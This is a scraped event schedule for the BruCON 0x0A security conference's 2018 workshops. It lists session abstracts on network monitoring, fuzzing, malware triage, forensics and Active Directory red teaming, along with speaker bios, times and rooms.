Loading…
BruCON 0x0A has ended

Sign up or log in to bookmark your favorites and sync them to your phone or calendar.

Workshop [clear filter]
Thursday, October 4
 

10:30

Introduction to Bro Network Security Monitor
Limited Capacity filling up

Bro is an open-source Network Security Monitor (NSM) and analytics platform. Even though it has been around since the mid 90's, its main user base was primarily universities, research labs and supercomputing centers. In the past few years, however, more and more security professionals in the industry turned their attention to this powerful tool, as it runs on commodity hardware, thus providing a low-cost alternative to commercial solutions. 

At its core, Bro inspects traffic and creates an extensive set of well-structured, tab-separated log files that record a network’s activity. Nonetheless, Bro is a lot more than just a traditional signature-based IDS. While it supports such standard functionality as well, Bro’s scripting language allows security analysts to perform arbitrary analysis tasks such as extracting files from sessions, detecting malware by interfacing with an external source, detecting brute-forcing, etc. It comes with a large set of pre-built standard libraries, just like Python. 

During this two-hour workshop, we will learn about Bro's capabilities and cover the following topics: 
- Introduction to Bro 
- Bro architecture 
- Bro events and logs 
- Bro signatures 
- Bro scripting 
- Bro and ELK 

Speakers
avatar for Eva Szilagyi

Eva Szilagyi

CEO, Alzette Information Security
Eva Szilagyi is managing partner and CEO of Alzette Information Security, a consulting company based in Luxembourg. She has more than 8 years of professional experience in penetration testing, security source code review, digital forensics, IT auditing, telecommunication networks... Read More →
avatar for David Szili

David Szili

CTO, Alzette Information Security
David Szili is managing partner and CTO of Alzette Information Security, a consulting company based in Luxembourg. He has more than 8 years of professional experience in penetration testing, red teaming, vulnerability assessment, vulnerability management, security monitoring, security... Read More →


Thursday October 4, 2018 10:30 - 12:30
03. Chimay Novotel

10:30

Python Toolsmithing 101
Limited Capacity full

In this 2 hour workshop, the attendees will learn how to create (security) tools in Python. With more than 30 years experience in the development of tools, 12 years of publication, more than 100 tools and at least a couple of tools widely used by the security community, Didier Stevens will share his knowledge in this workshop and teach attendees how to develop their own tools in Python.

To get a major boost when attendees start developing their first tool, Didier will share his private templates for the development of tools and explain all the features and how to develop with these templates. These private templates will become public after this workshop.

These templates are actually used by Didier to develop and publish new tools.

One template is for binary files. This template can not only read and process binary files, but also binary files stored in compressed files, binary files provided via stdin, generated files, here-documents, … Output can be generated in different formats: binary, hexadecimal, ASCII/Hexadecimal, custom, …

Another template is for text files. Like the binary file template, this template too has several input methods and output methods.

Attendees will learn about features that are common across Didier Stevens’ tools, and that they can use in their own tools developed with the templates.

After completing several exercises to get familiar with Python toolsmithing and Didier’s templates, 2 new tools (one binary tool and one text tool) will be developed by the attendees under Didier’s guidance.

After the workshop, attendees will have enough knowledge to get started as a Python toolsmith. Depending on the complexity of the tools they want to create, a new tool can be as simple as programming one new Python function, thanks to the features provided by the template.

Speakers
avatar for Didier Stevens

Didier Stevens

Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark Certified Network Analyst, ...) is a Senior Analyst working at NVISO (https://www.nviso.be). Didier has developed and published more than 100 tools, several of them popular in the security community. You... Read More →


Thursday October 4, 2018 10:30 - 12:30
04. Orval Novotel

10:30

Simplifying the art of instrumentation
Limited Capacity full

1. Source instrumentation & Binary instrumentation

2. Static
    a. Compile time instrumentation
        i. LLVM
        ii. AFL instrumentation use case
    b. Binary rewriting

3. Dynamic instrumentation
    a. Introduction
    b. PIN
    c. Dynamo Rio
    d. DynInst

4. Application of instrumentation in the domain of security:
    a. Coverage tracing
    b. Aiding reverse engineering
    c. Vulnerability discovery
    d. Malware analysis
    e. Taint analysis
    f. Debugging
    g. Data flow analysis
    h. Control flow analysis

Speakers
avatar for Rushikesh D. Nandedkar

Rushikesh D. Nandedkar

Rushikesh is a security analyst. Having more than six years of experience under his belt, his assignments have always been pointed towards reducing the state of insecurity for information. His research papers were accepted at NCACNS 2013, nullcon 2014, HITCON 2014, Defcamp 2014, BruCON... Read More →
avatar for Krishnakant B. Patil

Krishnakant B. Patil

Krishnakant: is a vulnerability researcher by profession. Yet, he is best known amongst the security researchers for his cutting edge capabilities and skills in reverse engineering, exploit development and malware analysis. He had successfully conducted many workshops and hands on... Read More →


Thursday October 4, 2018 10:30 - 12:30
05. La Trappe Novotel

10:30

The hunt is on: Engineering the NextGen Cyber Threat Detection System. Attackers, it’s not so easy to hide anymore! (Short Version)
Limited Capacity filling up

The cyber attack landscape has changed.  Malicious adversaries continue to enhance techniques used to exploit enterprise networks.  A key ingredient missing from our cyber experts is a better way to hunt for adversarial presence.  The purpose of this talk is to show how to engineer a brand new Cyber Threat Intelligence Detection System (CTDS) and release a new frameworks called Excalibur TIE Mark I, and Themis Network Analyzer that allows investigators to better way to hunt for new threats in real-time. This technical talk dives straight in to show how to engineer the intelligence engine and create autonomous network sensors that extract and analyze thousands of artifacts both from each host machine and directly from the enterprise network.  This system develops real indicators of compromise (IOC) from large data sets and then applies these IOCs to better protect your enterprise network from new attacks.

Novel approaches are presented with algorithms used to analyze, correlate, and produce IOCs allowing the investigator to better hunt for new threats, populate uniform data sets best for information dissemination and analysis, and create new visualization graphs used for the human to derive meaning from vast amounts of data aggregation.  Finally, this talk applies everything we’ve learned and shows how to create new distributed network sensors and deploy IOCs discovered from the Threat Intelligence Engine to better protect the enterprise network.  Rest assured, lots of live demos are included in this talk.  And of course, this talk comes with a new open-source tool release for the community to use!

Attacks of tomorrow will no longer be as effective if we have the right tools to better hunt for the adversary.  This involves a new set of thinking.  Threat Intelligence will be the next paradigm in computer security.  Allow me to show you how to engineer the entire framework and deploy it on your network.

Speakers
avatar for Solomon Sonya

Solomon Sonya

Solomon Sonya (@Carpenter1010) is an Assistant Professor of Computer Science at the United States Air Force Academy. He has a background in software development, malware analysis, covert channels, steganography, distributed computing, computer hacking, information protection paradigms... Read More →


Thursday October 4, 2018 10:30 - 12:30
06. Rochefort Novotel

13:30

Python Toolsmithing 101
Limited Capacity filling up

In this 2 hour workshop, the attendees will learn how to create (security) tools in Python. With more than 30 years experience in the development of tools, 12 years of publication, more than 100 tools and at least a couple of tools widely used by the security community, Didier Stevens will share his knowledge in this workshop and teach attendees how to develop their own tools in Python.

To get a major boost when attendees start developing their first tool, Didier will share his private templates for the development of tools and explain all the features and how to develop with these templates. These private templates will become public after this workshop.

These templates are actually used by Didier to develop and publish new tools.

One template is for binary files. This template can not only read and process binary files, but also binary files stored in compressed files, binary files provided via stdin, generated files, here-documents, … Output can be generated in different formats: binary, hexadecimal, ASCII/Hexadecimal, custom, …

Another template is for text files. Like the binary file template, this template too has several input methods and output methods.

Attendees will learn about features that are common across Didier Stevens’ tools, and that they can use in their own tools developed with the templates.

After completing several exercises to get familiar with Python toolsmithing and Didier’s templates, 2 new tools (one binary tool and one text tool) will be developed by the attendees under Didier’s guidance.

After the workshop, attendees will have enough knowledge to get started as a Python toolsmith. Depending on the complexity of the tools they want to create, a new tool can be as simple as programming one new Python function, thanks to the features provided by the template.

Speakers
avatar for Didier Stevens

Didier Stevens

Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark Certified Network Analyst, ...) is a Senior Analyst working at NVISO (https://www.nviso.be). Didier has developed and published more than 100 tools, several of them popular in the security community. You... Read More →


Thursday October 4, 2018 13:30 - 15:30
06. Rochefort Novotel

13:30

Developing Resilient Detections (with Obfuscation & Evasion in Mind)
Limited Capacity full

WARNING: Heavy obfuscation, evasion and general offensive techniques will be demonstrated to challenge and improve attendees’ defensive thinking and detection approaches!

Offensive tradecraft and "living off the land" techniques are discovered, developed and released to the public at breakneck speeds. Attackers begin using these techniques within hours of their release. However, defenders often spend days, weeks or months identifying and reactively creating signatures for these techniques. Often these reactive signatures are overly rigid; therefore, they are easily bypassed by simple modifications to the command or technique.

In this workshop we will:
    * Develop multiple layers of resilient host-based and network-based detections for several relevant "living off the land" attack techniques
    * Introduce incremental layers of obfuscation and evasion techniques to the attacker commands and payloads to iteratively evade and harden our detection approach
    * Learn about numerous host-based artifacts we can use for detection purposes (process arguments, common persistence locations, image load events, prefetch files, Shimcache, Amcache, SRUM - System Resource Usage Monitor, etc.)
    * Implement detection logic in numerous formats including IOCs (Indicators of Compromise), YARA rules, and Snort signatures

The author has several years of real-world experience creating, tuning and enriching real-time detections that run on 10+ million endpoints in 100's of environments around the world. This firsthand experience will help facilitate conversations around false positives, detection performance and signal-to-noise ratios – concepts that are often overlooked (and sometimes less relevant) when dealing only with smaller environments.

Speakers
avatar for Daniel Bohannon

Daniel Bohannon

 Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and developing effective detection signatures and processes (among other things). Matthew previously... Read More →


Thursday October 4, 2018 13:30 - 17:30
03. Chimay Novotel

13:30

Finding security vulnerabilities with modern fuzzing techniques
Limited Capacity full

Fuzzing is a very powerful technique to detect flaws and vulnerabilities in software. The aim of this hands-on workshop is to demonstrate different techniques which can be used to fuzz applications or libraries. Choosing the correct and most effective fuzzing technique will be discussed with real-world examples. Moreover, hints according common problems and pitfalls during fuzzing will be given. After discussing the theories behind modern fuzzing techniques we look at famouse fuzzers and how they can be used to find real-world vulnerabilities. In the second part important areas which influent the fuzzing results are covered. Moreover, we discuss differences between fuzzing open-source and closed-source applications and useful reverse engineering techniques which assist the fuzzing process.

Speakers
avatar for Rene Freingruber

Rene Freingruber

Senior Security Consultant, SEC Consult
René Freingruber has been working as a professional security consultant for SEC Consult for several years. He operates research in the fields of malware analysis, reverse engineering, fuzzing and exploit development. For his bachelor thesis he studied modern mitigation techniques... Read More →


Thursday October 4, 2018 13:30 - 17:30
05. La Trappe Novotel

13:30

Malware Triage: Analyzing Malscripts – Return of The Exploits!
Limited Capacity full

In recent years malscripts and file based exploits have become a main delivery method for malware. Malscripts are often heavily obfuscated and they can take many different forms including WScript, Javascript, macros, and PowerShell. There has also been been a rise in document based exploits used to deliver and execute these malscripts. As a result incident responders and malware analysts need to be comfortable analyzing different document formats, identifying potential exploits, and analyze malscripts.

In this workshop you will work through the triage of a live malware delivery chain that includes a malicious document, malicious scripts, and a final malware payload. During this process you will be exposed to different document based exploits, and you will practice the skills required to manually analyze malscripts. This workshop focuses on the fundamental analysis techniques used when identifying, deobfuscating, and analyzing maldocs and malscripts. However, we will also provide an introduction to automaton tools and techniques that can be used to speed up the analysis process.

This workshop is aimed at junior incident responders, hobby malware analysts, and general security or IT practitioners who are interested in learning more about the malware triage process. If you have no experience with malware analysis but you have a good understanding of scripting languages like VBScript, and Javascript, and you are familiar with windows internals you should have no problem completing the workshop.

You will be provided with a VirtualMachine to use during the workshop, please make sure to bring a laptop that meets the following requirements. Your laptop must have VirtualBox installed and working (VMWare is not supported). Your laptop must have at least 60GB of disk space free, preferably 100GB. Your laptop must be able to mount USB storage devices. Make sure you have the appropriate dongle if you need one.

Speakers
avatar for Sergei Frankoff

Sergei Frankoff

Twitter: @herrcore YouTube: https://www.youtube.com/oalabs Sergei is a co-founder of Open Analysis, and volunteers as a malware researcher. When he is not reverse engineering malware Sergei is focused on building automation tools for malware analysis. Sergei is a strong believer... Read More →
avatar for Sean Wilson

Sean Wilson

Twitter: @seanmw YouTube: https://www.youtube.com/oalabs Sean is a co-founder of Open Analysis, and volunteers as a malware researcher. He splits his time between reverse engineering malware and building automation tools for incident response. He is an active contributor to open... Read More →


Thursday October 4, 2018 13:30 - 17:30
04. Orval Novotel

15:45

A goldmine within an ocean of data – basics of network forensics
Limited Capacity full

/!\ Important Notice /!\

For The workshop, the participants are requested to download the SOF-ELK Virtual Machine.
You can find the VM at the following address:  https://github.com/philhagen/sof-elk/blob/master/VM_README.md

Please have the VM ready to use for the workshop.
Thank you!
-------------------------------------------------------------------------------------------------------------------------------------

Loads of data passes over a corporate network. Finding usefull things in this stream can be overwelming. This workshop will give a brief introduction on how you can capture this data. Next we'll tackle the main focus of this workshop: handling the huge load of data with mostly Free and Open Source Software. To finalize we'll tackle the subject of automating the process.

Speakers
avatar for Andy Deweirt

Andy Deweirt

I’m a security consultant with over 10 year of experience in infosecurity. I've built firewalls, architected solutions, tested security, broke infrastructure and built soc capabilities, A main thread within the multiple roles and assignments has mostly been network security. As... Read More →


Thursday October 4, 2018 15:45 - 17:45
06. Rochefort Novotel
 
Friday, October 5
 

10:30

A goldmine within an ocean of data – basics of network forensics
Limited Capacity filling up

/!\ Important Notice /!\

For The workshop, the participants are requested to download the SOF-ELK Virtual Machine.
You can find the VM at the following address:  https://github.com/philhagen/sof-elk/blob/master/VM_README.md

Please have the VM ready to use for the workshop.
Thank you!
-------------------------------------------------------------------------------------------------------------------------------------

Loads of data passes over a corporate network. Finding usefull things in this stream can be overwelming. This workshop will give a brief introduction on how you can capture this data. Next we'll tackle the main focus of this workshop: handling the huge load of data with mostly Free and Open Source Software. To finalize we'll tackle the subject of automating the process.

Speakers
avatar for Andy Deweirt

Andy Deweirt

I’m a security consultant with over 10 year of experience in infosecurity. I've built firewalls, architected solutions, tested security, broke infrastructure and built soc capabilities, A main thread within the multiple roles and assignments has mostly been network security. As... Read More →


Friday October 5, 2018 10:30 - 12:30
03. Chimay Novotel

10:30

Finding security vulnerabilities with modern fuzzing techniques (Short Version)
Limited Capacity full

Fuzzing is a very powerful technique to detect flaws and vulnerabilities in software. The aim of this hands-on workshop is to demonstrate different techniques which can be used to fuzz applications or libraries. Choosing the correct and most effective fuzzing technique will be discussed with real-world examples. Moreover, hints according common problems and pitfalls during fuzzing will be given. After discussing the theories behind modern fuzzing techniques we look at famouse fuzzers and how they can be used to find real-world vulnerabilities. In the second part important areas which influent the fuzzing results are covered. Moreover, we discuss differences between fuzzing open-source and closed-source applications and useful reverse engineering techniques which assist the fuzzing process.

Speakers
avatar for Rene Freingruber

Rene Freingruber

Senior Security Consultant, SEC Consult
René Freingruber has been working as a professional security consultant for SEC Consult for several years. He operates research in the fields of malware analysis, reverse engineering, fuzzing and exploit development. For his bachelor thesis he studied modern mitigation techniques... Read More →


Friday October 5, 2018 10:30 - 12:30
06. Rochefort Novotel

10:30

ICS Forensic Workshop
Limited Capacity filling up

You are an incident responder working for a nuclear waste management system. An incident has taken place in the industrial environment where a number of valves for the main waste storage tank are sporadically opening and closing. The valves are controlled by a PLC and the local security operations centre (SOC), suspect that it may be due to an attack against the PLC. You are provided a network pcap file and a dump of the data-blocks from the PLC for analysis. You are expected to analyse the data to attempt to determine what occurred and how the behaviour of the valve has been modified.

Speakers
avatar for Joe Stirland

Joe Stirland

Joe Stirland is a senior scientist and technical Lead for the Airbus DTO – ZSCA Cyber Forensics lab and is responsible for state of the art research within the cyber forensics field in support of Airbus (Airbus, Airbus Helicopters, Airbus Defence & Space, and Airbus HQ). He holds... Read More →


Friday October 5, 2018 10:30 - 12:30
05. La Trappe Novotel

10:30

Jedi tricks to convince your boss (Episode 2)
Limited Capacity filling up

The 2017 Global Information Security Workforce Study showed that communication skills are the most wanted competences seeked by 66% of hiring managers while only 25% of security professionals put these skills on their developpment track.
Today, in most organizations, it is unlikely you will be able to improve your company's security if you're not able to convince people to move towards the right direction. Assertiveness

Speakers
avatar for Emmanuel Nicaise

Emmanuel Nicaise

Emmanuel Nicaise has 25 years of experience in IT amongst which about 19 in security. With a degree in IT and a master’s in clinical psychology, he’s naturally focusing on human-centric security management and on the different ways to foster a better security culture in organizations... Read More →


Friday October 5, 2018 10:30 - 12:30
04. Orval Novotel

13:30

The story of greendale
Limited Capacity filling up

Ever wanted to do forensics and feel good about it? This workshop will introduce you to a suite of open-source tools for all things digital forensics and incident response. You will see how Greendale (a fictitious but very famous university) used this set of tools to articulate an effective response to a pretty severe incident last summer—all on a state-financed university budget! We will cover collection of forensic evidence with GRR, processing with Plaso, and analysis with Timesketch; how these tools can be articulated using dftimewolf, how to remotely image disks and have the processing done in the Cloud.

Speakers
avatar for Thomas Chopitea

Thomas Chopitea

Thomas is a forensics investigator and engineer at Google. He focuses on digital forensics, incident response, and building the bricks that make his team’s investigation and response process as smooth and efficient as possible. His long-term professional goal is to automate himself... Read More →
avatar for Daniel White

Daniel White

Daniel White is a security engineer at Google and the tech lead for the Plaso project. He is focused on keeping people and data safe. He works on forensics, incident response and tool development.


Friday October 5, 2018 13:30 - 16:30
03. Chimay Novotel

13:30

Active Directory Redteaming : Attacking the backbone of Enterprise environments
Limited Capacity filling up

This workshop covers attacking an Active Directory environment using
built-in tools like PowerShell and other MS signed binaries. Using the
assume breach methodology, we start as a normal user in domain and
silently work our way up to the highest privileges at the enterprise level.

We will focus on not touching disk, abuse of functionality and evading
detection mechanisms to avoid detection and still achieve true domain
dominance.

Speakers
avatar for Nikhil Mittal

Nikhil Mittal

Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His area of interest includes red teaming, active directory, attack research, defense strategies and post exploitation research. He has 9+ years of experience in red teaming. He specializes in assessing security... Read More →


Friday October 5, 2018 13:30 - 17:30
05. La Trappe Novotel

13:30

The hunt is on: Engineering the NextGen Cyber Threat Detection System. Attackers, it’s not so easy to hide anymore!
Limited Capacity filling up

The cyber attack landscape has changed.  Malicious adversaries continue to enhance techniques used to exploit enterprise networks.  A key ingredient missing from our cyber experts is a better way to hunt for adversarial presence.  The purpose of this talk is to show how to engineer a brand new Cyber Threat Intelligence Detection System (CTDS) and release a new frameworks called Excalibur TIE Mark I, and Themis Network Analyzer that allows investigators to better way to hunt for new threats in real-time. This technical talk dives straight in to show how to engineer the intelligence engine and create autonomous network sensors that extract and analyze thousands of artifacts both from each host machine and directly from the enterprise network.  This system develops real indicators of compromise (IOC) from large data sets and then applies these IOCs to better protect your enterprise network from new attacks.

Novel approaches are presented with algorithms used to analyze, correlate, and produce IOCs allowing the investigator to better hunt for new threats, populate uniform data sets best for information dissemination and analysis, and create new visualization graphs used for the human to derive meaning from vast amounts of data aggregation.  Finally, this talk applies everything we’ve learned and shows how to create new distributed network sensors and deploy IOCs discovered from the Threat Intelligence Engine to better protect the enterprise network.  Rest assured, lots of live demos are included in this talk.  And of course, this talk comes with a new open-source tool release for the community to use!

Attacks of tomorrow will no longer be as effective if we have the right tools to better hunt for the adversary.  This involves a new set of thinking.  Threat Intelligence will be the next paradigm in computer security.  Allow me to show you how to engineer the entire framework and deploy it on your network.

Speakers
avatar for Solomon Sonya

Solomon Sonya

Solomon Sonya (@Carpenter1010) is an Assistant Professor of Computer Science at the United States Air Force Academy. He has a background in software development, malware analysis, covert channels, steganography, distributed computing, computer hacking, information protection paradigms... Read More →


Friday October 5, 2018 13:30 - 17:30
04. Orval Novotel